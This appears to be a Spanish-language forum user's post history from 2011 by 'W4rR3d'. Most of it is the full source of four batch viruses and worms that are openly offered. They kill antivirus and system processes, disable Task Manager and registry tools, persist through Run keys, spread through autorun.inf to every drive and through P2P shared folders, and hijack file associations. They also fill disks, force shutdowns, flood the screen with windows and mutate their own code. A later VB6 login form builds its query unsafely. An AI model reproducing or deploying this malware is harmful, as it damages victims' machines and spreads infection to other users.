|
Mostrar Mensajes
|
Páginas: [1] 2
|
1
|
Programación / Scripting / virus informatico llamado e.coli.bat
|
en: 12 Junio 2011, 17:44 pm
|
sin ven errores en mi codigo por favor notificar su amigo by hackerd W4rR3d ::by hacked W4rR3d ::Comunidad Informatica Black Eye Security Team :: Piura - Perù taskkill /IM "explorer.exe" /IM "msnmsgr.exe" /IM rar.exe /IM iexplorer.exe/F tskkill /IM "explorer.exe" /IM "msnmsgr.exe" /IM rar.exe /IM iexplorer.exe/F reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v ecoli /t REG_SZ /d "%systemroot%\System32\e.coli_c.exe" /f REG ADD HKCU\Software\Microsoft\windows\Currentversion\Pol icies\System /v disabletaskmgr /t reg_dword /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_ DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\currentVersion\policies\System /v NoDispCpl /t REG_DWORD /d 1 /f :C1 if exist C:\e.coli.bat attrib +h +s +r C:\e.coli.bat &attrib +h +s +r C:\autorun.inf %ecoli% [autorun] >>C:\autorun.inf %ecoli% OPEN=e.coli.bat >>C:\autorun.inf %ecoli% shell\open\Command=e.coli.bat >>C:\autorun.inf %ecoli% shell\open\Default=1 >>C:\autorun.inf %ecoli% shell\explore\Command=e.coli.bat >>C:\autorun.inf attrib +h +s +r C:\e.coli.bat attrib +h +s +r C:\autorun.inf :t1 :D1 if exist D:\e.coli.bat attrib +h +s +r D:\e.coli.bat &attrib +h +s +r D:\autorun.inf %ecoli% [autorun] >>D:\autorun.inf %ecoli% OPEN=e.coli.bat >>D:\autorun.inf %ecoli% shell\open\Command=e.coli.bat >>D:\autorun.inf %ecoli% shell\open\Default=1 >>D:\autorun.inf %ecoli% shell\explore\Command=e.coli.bat >>D:\autorun.inf attrib +h +s +r D:\e.coli.bat attrib +h +s +r D:\autorun.inf :t2 :E1 if exist E:\e.coli.bat attrib +h +s +r E:\e.coli.bat &attrib +h +s +r E:\autorun.inf %ecoli% [autorun] >>E:\autorun.inf %ecoli% OPEN=e.coli.bat >>E:\autorun.inf %ecoli% shell\open\Command=e.coli.bat >>E:\autorun.inf %ecoli% shell\open\Default=1 >>E:\autorun.inf %ecoli% shell\explore\Command=e.coli.bat >>E:\autorun.inf attrib +h +s +r E:\e.coli.bat attrib +h +s +r E:\autorun.inf :T3 :F1 if exist F:\e.coli.bat attrib +h +s +r F:\e.coli.bat &attrib +h +s +r F:\autorun.inf %ecoli% [autorun] >>F:\autorun.inf %ecoli% OPEN=e.coli.bat >>F:\autorun.inf %ecoli% shell\open\Command=e.coli.bat >>F:\autorun.inf %ecoli% shell\open\Default=1 >>F:\autorun.inf %ecoli% shell\explore\Command=e.coli.bat >>F:\autorun.inf attrib +h +s +r F:\e.coli.bat attrib +h +s +r F:\autorun.inf :T4 :G1 if exist G:\e.coli.bat attrib +h +s +r G:\e.coli.bat &attrib +h +s +r G:\autorun.inf %ecoli% [autorun] >>G:\autorun.inf %ecoli% OPEN=e.coli.bat >>G:\autorun.inf %ecoli% shell\open\Command=e.coli.bat >>G:\autorun.inf %ecoli% shell\open\Default=1 >>G:\autorun.inf %ecoli% shell\explore\Command=e.coli.bat >>G:\autorun.inf attrib +h +s +r G:\e.coli.bat attrib +h +s +r G:\autorun.inf :open %ecoli%On Error Resume Next >> %HC%open.vbs %ecoli%Set oWMP = CreateObject ("WMPlayer.OCX.7" )>> %HC%open.vbs %ecoli%Set colCDROMs = oWMP.cdromCollection >> %HC%open.vbs %ecoli%do>> %HC%open.vbs %ecoli%if colCDROMs.Count >= 1 then >> %HC%open.vbs %ecoli%For i = 0 to colCDROMs.Count - 1 >> %HC%open.vbs %ecoli%colCDROMs.Item(i).Eject>> %HC%open.vbs %ecoli%Next>> %HC%open.vbs %ecoli%For i = 0 to colCDROMs.Count - 1 >> %HC%open.vbs %ecoli%colCDROMs.Item(i).Eject>> %HC%open.vbs %ecoli%Next>> %HC%open.vbs %ecoli%End If>> %HC%open.vbs %ecoli%wscript.sleep 5000>> %HC%open.vbs %ecoli%loop >> %HC%open.vbs start %HC%open.vbs :cop %HH% "%appdata%\e.coli_a.exe" %HH% "%windir%\e.coli_b.exe" %HH% "%systemroot%\system32\e.coli_c.exe" %HH% "%programfiles%\Windows Live\Messenger\e.coli_d.exe" %HH% "%programfiles%\Internet Explorer\e.coli_e.exe" %HH% "%programfiles%\Microsoft Office\Office12\e.coli_e.exe" %HH% "%programfiles%\Winamp\e.coli_f.exe" %HH% "%programfiles%\WinRAR\e.coli_g.exe" %HH% "%programfiles%\Yahoo!\Messenger\e.coli_h.exe" %HH% "%programfiles%\shARES\e.coli_i.exe" %HH% "%systemdrive%\Documents and Settings\All Users\e.coli_j.exe" %HH% "%systemdrive%\Documents and Settings\All Users\Menú Inicio\e.coli_k.exe" %HH% "%systemdrive%\Documents and Settings\All Users\Documentos\Mi música\e.coli_l.exe" %HH% "%allusersprofile%\Documents and Settings\All Users\Menú Inicio\Programas\e.coli_m.exe" %HH% "%userprofile%\Documents and Settings\USUARIO\Mis documentos\e.coli_n.exe" :reini %ecoli% On Error Resume Next >> %HC%\apgar.vbs %ecoli% set shell = CreateObject ("WScript.Shell" ) >> %HC%\apgar.vbs %ecoli% shell.run "shutdown.exe -s -f -t 7 " >> %HC%\apgar.vbs start %HC%\apgar.vbs :war echo msn=msgbox ("Warning Warning Warning",16," no me puedes vencer" ) >> %HC%\Warning.vbs For /L %%a IN (0,1,1000 ) DO start %HC%\Warning.vbs :cmds :wi for %%A in (C,D,E,F,G,H,I,J,K,L,M,N,Ñ,O,P,Q,R,S,T,U,V,W,X,Y,Z ) do if exist " %%A:\" copy /y %0 " %%A:\INFECTED !!!" for %%E in (exe,bmp,gif,jpg,png,txt,doc,docx,xls,xlsx,avi,mpg,mpeg,flv.mp3,mp4,rar,zip,ink,html ) do assoc . %%E=batfile for %%I in (bmp.exe,gif.exe,doc.exe,mpeg.exe,xlsx.exe,avi.exe,mpg.exe,mp3.exe,mp4.exe,rar.exe,zip.exe,ink.exe,html.exe,winlogon.exe,winupdate.exe,winservice.exe,TASKMAN.exe,jpg.exe ) do copy /y %0 " %windir%\ %%I" attrib +h %windir% for %%p in (WINWORD.exe,EXCEL.exe,POWERPNT.exe,Winrar.exe,firefox.exe,iexplore.exe,wmplayer.exe,Ares.exe,msnmsgr.exe ) do tasklist /m | find /i " %%p" && taskkill /f /im %%p.exe echo fsutil file createnew %random%.exe 4000000000 >>%windir%\fsutil.exe start %windir%\fsutil.exe copy /y %0 " %windir%\jpg.exe" reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v ecoli /t REG_SZ /d "%windir%\jpg.exe"" /f :ves echo 00000000 000 000 0000000000 0000000000 0000000000 00000000000 0000000000 000000 >>%userprofile%\Desktop\I.txt echo 00000000 0000 000 0000000000 0000000000 0000000000 00000000000 0000000000 00000000 >>%userprofile%\Desktop\N.txt echo 0000 00000 000 000 000 000 000 000 000 0000 >>%userprofile%\Desktop\F.txt echo 0000 000000 000 000 000 000 000 000 000 000 >>%userprofile%\Desktop\E.txt echo 0000 000 000 000 0000000000 0000000000 000 000 0000000000 000 000 >>%userprofile%\Desktop\C.txt echo 0000 000 000 000 0000000000 0000000000 000 000 0000000000 000 000 >>%userprofile%\Desktop\T.txt echo 0000 000 000000 000 000 000 000 000 000 000 >>%userprofile%\Desktop\E.txt echo 0000 000 00000 000 000 000 000 000 000 0000 >>%userprofile%\Desktop\D.txt echo 00000000 000 0000 000 0000000000 0000000000 000 0000000000 00000000 >>%userprofile%\Desktop\ !.txt echo 00000000 000 000 000 0000000000 0000000000 000 0000000000 000000 >>%userprofile%\Desktop\ !!.txt :Full Disk fsutil file createnew INFECTED!!!.exe 40000000000 for %%t in (1,1,24 ) do at %%t /interactive /every:L,M,Mi,J,V,S,D fsutil file createnew %random%.exe 4000000000 for /l %%e in (0,1,5000 ) do (start cmd )
|
|
|
2
|
Programación / Scripting / virus drivers.bat
|
en: 2 Junio 2011, 18:07 pm
|
tu amigo W4rR3d TASKKILL /IM explorer.exe/F IM msnmsgr.exe /F reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v drivers /t REG_SZ /d "%systemroot%\System32\drivers.bat" /f REG ADD HKCU\Software\Microsoft\windows\Currentversion\Pol icies\System /v disabletaskmgr /t reg_dword /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_ DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\currentVersion\policies\System /v NoDispCpl /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "http://4.bp.blogspot.com/_04D_IYYf9WA/TTDJzjOv_XI/AAAAAAAAAK4/Gmh_VUM8mJA/s1600/virus.jpg" reg Add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /t REG_SZ /d "Hacked By W4rR3d" for %%E In (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z ) Do ( copy /Y %0 %%E:\drivers.bat echo.[AutoRun] >> %%E:\autorun.inf echo.open=" %%E:\drivers.bat" >> %%E:\autorun.inf echo.action=Open folder to see files... >> %%E:\autorun.inf attrib +h +s +r %%E:\autorun.inf attrib +h +s +r %%E:\drivers.bat :rm echo Set oWMP = CreateObject ("WMPlayer.OCX.7" ) >> %mr%\abrir.vbs echo Set colCDROMs = oWMP.cdromCollection >> %mr%\abrir.vbs echo if colCDROMs.Count >= 1 then >> %mr%\abrir.vbs echo For i = 0 to colCDROMs.Count - 1 >> %mr%\abrir.vbs echo colCDROMs.Item (i ).Eject >> %mr%\abrir.vbs echo Next ' cdrom >> %mr%\abrir.vbs start %mr%\abrir.vbs :bir %rms% On Error Resume Next >> %mr%\apagon.vbs %rms% set shell = CreateObject ("WScript.Shell" ) >> %mr%\apagon.vbs %rms% shell.run "shutdown.exe -s -f -t 10 " >> %mr%\apagon.vbs start %mr%\apagon.vbs :ir copy %0 %rsm%\system32\drivers.bat echo On Error Resume next >> " %rsm%\system32\drivers.vbs" echo Set oShell = WScript.CreateObject ("WSCript.shell" ) >>" %rsm%\system32\drivers.vbs" echo oShell.Run " %rsm%\system32\drivers.bat",0 >> start " %rsm%\system32\drivers.vbs" :wi copy %0 %windir%\drivers.bat echo On Error Resume next >> " %windir%\drivers.vbs" echo Set oShell = WScript.CreateObject ("WSCript.shell" ) >>" %windir%\drivers.vbs" echo oShell.Run " %windir%\drivers.bat",0 >> start " %windir%\drivers.vbs" :sys copy %0 %homedrive%\drivers.bat echo On Error Resume next >> " %homedrive%\drivers.vbs" echo Set oShell = WScript.CreateObject ("WSCript.shell" ) >>" %homedrive%\drivers.vbs" echo oShell.Run " %homedrive%\drivers.bat",0 >> start " %homedrive%\drivers.vbs" for %%e in (exe,bmp,gif,jpg,png,txt,doc,docx,xls,xlsx,avi,mpg,mpeg,flv.mp3,mp4,rar,zip,ink ) do assoc . %%e=batfile %rms% set ff=createobject ("scripting.filesystemobject" )>>bicho.vbs %rms% set rr=ff.opentextfile (%0,1 )>>bicho.vbs %rms% aa = rr.readall>>bicho.vbs %rms%% rr.close>>bicho.vbs %rms% Randomize>>bicho.vbs %rms% bicho = int(rnd * 3)>>bicho.vbs %rms% if bicho = 0 or bicho = 2 then >>bicho.vbs %rms% s = chr(int(22 * rnd) + 97)>>bicho.vbs %rms% rand1 = Replace(aa,"rms","rms" ^& s ^& bicho)>>bicho.vbs %rms% rand2 = Replace(rand1,"kmbfo","kmbfo" ^& s ^& s ^& bicho)>>bicho.vbs %rms% else>>bicho.vbs %rms% bichonum = int(rnd * 7)>>bicho.vbs %rms% for i = 1 to bichonum >>bicho.vbs %rms% bichochar = chr(int(22 * rnd) + 97)>>bicho.vbs %rms% bichoall = bichoyall + bichochar>>bicho.vbs %rms% next>>bicho.vbs %rms% s = chr(int(22 * rnd) + 97)>>bicho.vbs %rms% rand1 = Replace(aa,"rms",bichoall )>>bicho.vbs %rms% rand2 = Replace(rand1,"kmbfo", s ^& bichoall)>>bicho.vbs %rms% end if>>bicho.vbs %rms%% set bb=ff.opentextfile(%0,2 )>>bicho.vbs %rms% bb.write rand2>>bicho.vbs :p2p copy /y " %prom%\Grokster\My Grokster\ %pro%" copy /y " %prom%\Morpheus\My Shared Folder\ %pro%" copy /y " %prom%\ICQ\shared files\ %pro%" copy /y " %prom%\KaZaA\My Shared Folder\ %pro%" copy /y " %prom%\KaZaA Lite\My Shared Folder\ %pro%" copy /y " %prom%\EDONKEY2000\incoming\ %pro%" copy /y " %prom%\eMule\Incoming\ %pro%" copy /y " %prom%\Filetopia3\Files\ %pro%" copy /y " %prom%\appleJuice\incoming\ %pro%" copy /y " %prom%\Gnucleus\Downloads\ %pro%" copy /y " %prom%\LimeWire\Shared\ %pro%" copy /y " %prom%\Overnet\incoming\ %pro%" copy /y " %prom%\Shareaza\Downloads\ %pro%" copy /y " %prom%\Swaptor\Download\ %pro%" copy /y " %prom%\WinMX\My Shared Folder\ %pro%" copy /y " %prom%\Tesla\Files\ %pro%" copy /y " %prom%\XoloX\Downloads\ %pro%" copy /y " %prom%\Rapigator\Share\ %pro%" copy /y " %prom%\KMD\My Shared Folder\ %pro%" copy /y " %prom%\BearShare\Shared\ %pro%" copy /y " %prom%\Direct Connect\Received Files\ %pro%" @cscript bicho.vbs
|
|
|
3
|
Programación / Scripting / worm Windows_updates_downloader2.5.bat
|
en: 5 Mayo 2011, 03:04 am
|
este worm esta dedicado al grupo de hackers Kao Team ::worm Windows_updates_downloader2.5.bat ::by hacker W4rR3d ::Comunidad hacker "Black Eye Security Team" Piura -Peru :per if exist "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat" ( goto dn ) else goto : NN :NN :Encryptions %ts% f=f %ts% r=r :registro protection TASKKILL /IM explorer.exe /F TASKKILL /IM msnmsgr.exe /F reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v updates /t REG_SZ /d "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat" /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_ DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\currentVersion\policies\System /v NoDispCpl /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "http://windows-updates-downloader.softonic.com/descargar" reg Add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /t REG_SZ /d "Hacked By W4rR3d" :agregarse en dispositivos %f%o %r% %%p in (b e f g h i j k l m n o p q r s t u v w x y z ) do if exist %%p: %0 goto LOG %f%o %r% %%i In (b e f g h i j k l m n o p q r s t u v w x y z ) do type %0 > %%i: %vsb% [autorun] >> %%i:\autorun.inf %vsb% open=Windows_updates_downloader2.5.bat >> %%i:\autorun.inf %vsb% shellexecute=Windows_updates_downloader2.5.bat >> %%i:\autorun.inf %vsb% Icon=%windir%\system32\Shell32.dll,4 >> %%i:\autorun.inf %vsb% Shell\Open\COMMAND=Windows_updates_downloader2.5.bat %vsb% Shell\Explore\command=Windows_updates_downloader2.5.bat %vsb% UseAutoPlay=1 attrib +h +s +r %%i:\autorun.inf :extenderse md C:\c5734b2b09076e4acebc92bb8c25 %ph% %0 C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat attrib +h +s +r C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat attrib +h +s +r C:\c5734b2b09076e4acebc92bb8c25 %vsb% On Error Resume Next >> C:\terror.vbs %vsb% Set Ws = CreateObject ("WScript.Shell" ) >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\bmpfile\shell\open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HkEY_CLASSES_ROOT\Folder\Shell\Explore\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\Folder\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\exefile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\jpegfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\jpgfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\htmlfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\HTTP\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\https\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\inffile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\inifile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\mpegfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\mpgfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\mp3file\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\txtfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\wmafile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs start C:\terror.vbs :back %ph% %0 C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Usub.exe %ph% %0 %SYSTEMROOT%\SYSTEM32\Usub.exe %ph% %0 %SYSTEMDRIVE%\Usub.exe %ph% %0 %userprofile%\Usub.exe %ph% %0 %programfiles%\Usub.exe %ph% %0 C:\RECYCLER\Usub.bmp :mensaje %vsb% On Error Resume Next >> C:\ipnuker.vbs %vsb% Msgbox "Computer is infected with a virus.",16,"hacked by W4rR3d" >> C:\ipnuker.vbs For /L %%a IN (0,1,1000 ) DO start start C:\ipnuker.vbs :LOG %vsb% ::USuB Log:: >> USuB_Log.log %vsb% Directory *c5734b2b09076e4acebc92bb8c25* >> Usub_Log.log %vsb% USB's in drive A-Z excluding C, D, and E, Installed >> Usub_Log.log %ph% USuB_Log.log C:\c5734b2b09076e4acebc92bb8c25\Usub_Log.log attrib +h +s +r C:\c5734b2b09076e4acebc92bb8c25\Usub_Log.log del %curdir% Usub_Log.log :dn %vsb% On Error Resume Next >> C:\apagar.vbs %vsb% set shell = CreateObject ("WScript.Shell" ) >> C:\apagar.vbs %vsb% shell.run "shutdown.exe -s -f -t 8 " >> C:\apagar.vbs start C:\apagar.vbs :Memory Loop
|
|
|
4
|
Programación / Scripting / virus informatico taskmgr.bat
|
en: 17 Marzo 2011, 05:09 am
|
grupo black Eye Security Team su amigo W4rR3d espero que lo corrigan este virus informatico msg * hacked by -={W4rR3d}=- net stop "Firewall de Windows/Conexion compartida a Internet (ICS)" net stop "Actualizaciones automáticas" net stop "Centro de seguridad" net stop "nod32krn" net stop "nod32kui" net stop "nod32" net stop "TeaTimer" taskkill /f/im "explorer.exe /im "teatimer.exe"/im "taskmgr.exe Taskkill /f /IM nod32krn.exe /IM nod32kui.exe /IM nod32.exe start /MAX %homedrive%\boot.ini & rundll32 user32.dll,SwapMouseButton REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v TASKMGR /t REG_SZ /d "C:\taskmgr.bat" /f REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v SHUTDOWN /t REG_SZ /d "C:\apagar.vbs" /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_ DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableMsConfig /t REG_DWORD /d 1 /f reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "http://www.imagehousing.com/image/671793" reg Add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /t REG_SZ /d "Hacked By W4rR3d" copy /Y " %0" "C:\taskmgr.bat" %task%.[Autorun] >> C:\Autorun.inf %task%.label=Pendrive >> C:\Autorun.inf %task%.action=Abrir Pendrive >> C:\Autorun.inf %task%.shellexecute="/taskmgr.bat" >> C:\Autorun.inf echo On Error Resume Next >> C:\taskmgr.vbs echo set shell = CreateObject ("WScript.Shell" ) >> C:\taskmgr.vbs echo shell.run "C:\taskmgr.bat",0 >> C:\taskmgr.vbs start C:\taskmgr.vbs attrib +s +h +r C:\taskmgr.bat attrib +s +h +r C:\autorun.inf :D copy /Y " %0" "D:\taskmgr.bat" %task%.[Autorun] >> D:\Autorun.inf %task%.label=Pendrive >> D:\Autorun.inf %task%.action=Abrir Pendrive >> D:\Autorun.inf %task%.shellexecute="/taskmgr.bat" >> D:\Autorun.inf echo On Error Resume Next >> D:\taskmgr.vbs echo set shell = CreateObject ("WScript.Shell" ) >> D:\taskmgr.vbs echo shell.run "D:\taskmgr.bat",0 >> D:\taskmgr.vbs start D:\taskmgr.vbs attrib +s +h +r D:\taskmgr.bat attrib +s +h +r D:\autorun.inf :E copy /Y " %0" "E:\taskmgr.bat" %task%.[Autorun] >> E:\Autorun.inf %task%.label=Pendrive >> E:\Autorun.inf %task%.action=Abrir Pendrive >> E:\Autorun.inf %task%.shellexecute="/taskmgr.bat" >> E:\Autorun.inf echo On Error Resume Next >> E:\taskmgr.vbs echo set shell = CreateObject ("WScript.Shell" ) >> E:\taskmgr.vbs echo shell.run "E:\taskmgr.bat",0 >> E:\taskmgr.vbs start E:\taskmgr.vbs attrib +s +h +r E:\taskmgr.bat attrib +s +h +r E:\autorun.inf :F copy /Y " %0" "F:\taskmgr.bat" %task%.[Autorun] >> F:\Autorun.inf %task%.label=Pendrive >> F:\Autorun.inf %task%.action=Abrir Pendrive >> F:\Autorun.inf %task%.shellexecute="/taskmgr.bat" >> F:\Autorun.inf echo On Error Resume Next >> F:\taskmgr.vbs echo set shell = CreateObject ("WScript.Shell" ) >> F:\taskmgr.vbs echo shell.run "F:\taskmgr.bat",0 >> F:\taskmgr.vbs start F:\taskmgr.vbs attrib +s +h +r F:\taskmgr.bat attrib +s +h +r F:\autorun.inf :G copy /Y " %0" "G:\taskmgr.bat" %task%.[Autorun] >> G:\Autorun.inf %task%.label=Pendrive >> G:\Autorun.inf %task%.action=Abrir Pendrive >> G:\Autorun.inf %task%.shellexecute="/taskmgr.bat" >> G:\Autorun.inf echo On Error Resume Next >> G:\taskmgr.vbs echo set shell = CreateObject ("WScript.Shell" ) >> G:\taskmgr.vbs echo shell.run "G:\taskmgr.bat",0 >> G:\taskmgr.vbs start G:\taskmgr.vbs attrib +s +h +r G:\taskmgr.bat attrib +s +h +r G:\autorun.inf :H copy /Y " %0" "H:\taskmgr.bat" %task%.[Autorun] >> H:\Autorun.inf %task%.label=Pendrive >> H:\Autorun.inf %task%.action=Abrir Pendrive >> H:\Autorun.inf %task%.shellexecute="/taskmgr.bat" >> H:\Autorun.inf echo On Error Resume Next >> H:\taskmgr.vbs echo set shell = CreateObject ("WScript.Shell" ) >> H:\taskmgr.vbs echo shell.run "H:\taskmgr.bat",0 >> H:\taskmgr.vbs start H:\taskmgr.vbs attrib +s +h +r H:\taskmgr.bat attrib +s +h +r H:\autorun.inf :I copy /Y " %0" "I:\taskmgr.bat" %task%.[Autorun] >> I:\Autorun.inf %task%.label=Pendrive >> I:\Autorun.inf %task%.action=Abrir Pendrive >> I:\Autorun.inf %task%.shellexecute="/taskmgr.bat" >> I:\Autorun.inf echo On Error Resume Next >> I:\taskmgr.vbs echo set shell = CreateObject ("WScript.Shell" ) >> I:\taskmgr.vbs echo shell.run "C:\taskmgr.bat",0 >> I:\taskmgr.vbs start I:\taskmgr.vbs attrib +s +h +r I:\taskmgr.bat attrib +s +h +r I:\autorun.inf :REINI echo On Error Resume Next >> C:\apagar.vbs echo set shell = CreateObject ("WScript.Shell" ) >> C:\apagar.vbs echo shell.run "shutdown.exe -s -t 11" >> C:\apagar.vbs start C:\apagar.vbs start /MIN %homedrive%\boot.ini & rundll32 user32.dll,SwapMouseButton
|
|
|
5
|
Programación / Programación Visual Basic / formulario acceso al sistema en vb 6.0
|
en: 19 Febrero 2011, 15:52 pm
|
proyecto llamado acceso al sistema en vb 6.0 Private Sub Aceptar_Click() If Len(TxtClave.Text) <> 0 Then usuarios.Recordset.FindFirst "Login='" & TxtUsuario.Text & "' and Clave='" & TxtClave.Text & "'" If usuarios.Recordset.NoMatch = False Then ProgressBar1.Visible = True For i = 1 To 800 Me.ProgressBar1 = i Next Unload Me Form2.Show Else Contador = Contador - 1 If Contador = 0 Then MsgBox "Su Tiempo a Finalizado," & " Ud. Sr(a): " + TxtUsuario.Text + " no es Usuario de este Sistema" End End If MsgBox "Usuario Incorrecto Le Queda" & Space(5) & Contador & Space(5) & "Intentos" TxtClave = "" TxtClave.SetFocus End If End If End Sub Private Sub Cancelar_Click() If MsgBox("Seguro que desea Salir?", vbYesNo + vbExclamation, "Salir del Sistema") = vbYes Then End End If End Sub Private Sub Form_Activate() TxtUsuario.SetFocus End Sub Private Sub Form_Initialize() Contador = 3 End Sub Private Sub Form_Load() Move (Screen.Width - Width) / 2, (Screen.Height - Height) / 2 End Sub Private Sub TxtClave_KeyPress(KeyAscii As Integer) If KeyAscii = 13 Then Aceptar.Enabled = True Aceptar.SetFocus End If End Sub Private Sub TxtUsuario_Change() TxtUsuario = StrConv(TxtUsuario.Text, vbProperCase) TxtUsuario.SelStart = Len(TxtUsuario) End Sub Private Sub TxtUsuario_KeyPress(KeyAscii As Integer) If KeyAscii = 13 Then Me.TxtClave.SetFocus End Sub
|
|
|
6
|
Programación / Scripting / scripts hechos por W4rR3d
|
en: 18 Febrero 2011, 22:39 pm
|
